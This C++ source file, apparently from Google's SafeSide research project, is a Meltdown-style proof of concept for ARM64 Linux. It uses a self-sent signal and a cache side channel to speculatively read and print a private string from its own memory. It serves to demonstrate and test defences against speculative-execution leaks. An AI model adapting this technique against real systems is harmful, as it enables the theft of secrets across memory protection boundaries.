| /* |
| * Copyright 2019 Google LLC |
| * |
| * Licensed under the Apache License, Version 2.0 (the "License"); |
| * you may not use this file except in compliance with the License. |
| * You may obtain a copy of the License at |
| * |
| * https://www.apache.org/licenses/LICENSE-2.0 |
| * |
| * Unless required by applicable law or agreed to in writing, software |
| * distributed under the License is distributed on an "AS IS" BASIS, |
| * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. |
| * See the License for the specific language governing permissions and |
| * limitations under the License. |
| */ |
| |
| #include "compiler_specifics.h" |
| |
| #if !SAFESIDE_LINUX |
| # error Unsupported OS. Linux required. |
| #endif |
| |
| #if !SAFESIDE_ARM64 |
| # error Unsupported architecture. ARM64 required. |
| #endif |
| |
| #include <array> |
| #include <cstring> |
| #include <iostream> |
| |
| #include <signal.h> |
| #include <sys/syscall.h> |
| #include <sys/types.h> |
| #include <unistd.h> |
| |
| #include "cache_sidechannel.h" |
| #include "instr.h" |
| #include "local_content.h" |
| #include "meltdown_local_content.h" |
| #include "utils.h" |
| |
| static char LeakByte(const char *data, size_t offset) { |
| CacheSideChannel sidechannel; |
| const std::array<BigByte, 256> &oracle = sidechannel.GetOracle(); |
| |
| for (int run = 0;; ++run) { |
| size_t safe_offset = run % strlen(public_data); |
| sidechannel.FlushOracle(); |
| |
| // Architecturally access the safe offset. |
| ForceRead(oracle.data() + static_cast<size_t>(data[safe_offset])); |
| |
| // Sends a SIGUSR1 signal to itself. The signal handler shifts the control |
| // flow to the "afterspeculation" label. |
| // We don't want to use the "syscall" library function in order to avoid |
| // Spectre v2 effects that the CPU jumps over that call, because we cannot |
| // serialize that later. |
| asm volatile( |
| "mov x8, %0\n" |
| "mov x0, %1\n" |
| "mov x1, %2\n" |
| "svc #0\n"::"r"(__NR_kill), "r"(getpid()), "r"(SIGUSR1)); |
| |
| // Unreachable code. Speculatively access the unsafe offset. |
| ForceRead(oracle.data() + static_cast<size_t>(data[offset])); |
| |
| std::cout << "Dead code. Must not be printed." << std::endl; |
| |
| // The exit call must not be unconditional, otherwise clang would optimize |
| // out everything that follows it and the linking would fail. |
| if (strlen(public_data) != 0) { |
| exit(EXIT_FAILURE); |
| } |
| |
| // SIGUSR1 signal handler moves the instruction pointer to this label. |
| asm volatile("afterspeculation:"); |
| |
| std::pair<bool, char> result = |
| sidechannel.RecomputeScores(data[safe_offset]); |
| |
| if (result.first) { |
| return result.second; |
| } |
| |
| if (run > 100000) { |
| std::cerr << "Does not converge " << result.second << std::endl; |
| exit(EXIT_FAILURE); |
| } |
| } |
| } |
| |
| int main() { |
| OnSignalMoveRipToAfterspeculation(SIGUSR1); |
| std::cout << "Leaking the string: "; |
| std::cout.flush(); |
| const size_t private_offset = private_data - public_data; |
| for (size_t i = 0; i < strlen(private_data); ++i) { |
| std::cout << LeakByte(public_data, private_offset + i); |
| std::cout.flush(); |
| } |
| std::cout << "\nDone!\n"; |
| } |